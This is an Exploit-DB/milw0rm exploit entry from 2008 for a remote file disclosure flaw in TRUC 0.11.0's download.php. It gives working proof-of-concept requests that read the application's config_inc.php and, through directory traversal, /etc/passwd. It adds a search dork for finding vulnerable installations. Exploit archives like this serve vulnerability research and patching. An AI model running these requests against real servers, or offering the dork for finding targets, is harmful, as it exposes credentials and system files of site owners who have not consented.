TRUC 0.11.0 - 'download.php' Remote File Disclosure

EDB-ID:

5129

Author:

GoLd_M

Type:

webapps

Platform:

PHP

Published:

2008-02-16

### TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability
### http://switch.dl.sourceforge.net/sourceforge/truc/truc_0.11.0.tar.gz
### POC :
### /download.php?upload_filename=config_inc.php
### /download.php?upload_filename=../../../../../../../../etc/passwd
### Dork : TRUC 0.11.0 :: © 2006 by ASDIS :
### I'm TRYAGI  ;)  -- Tryag.cc/cc

# milw0rm.com [2008-02-16]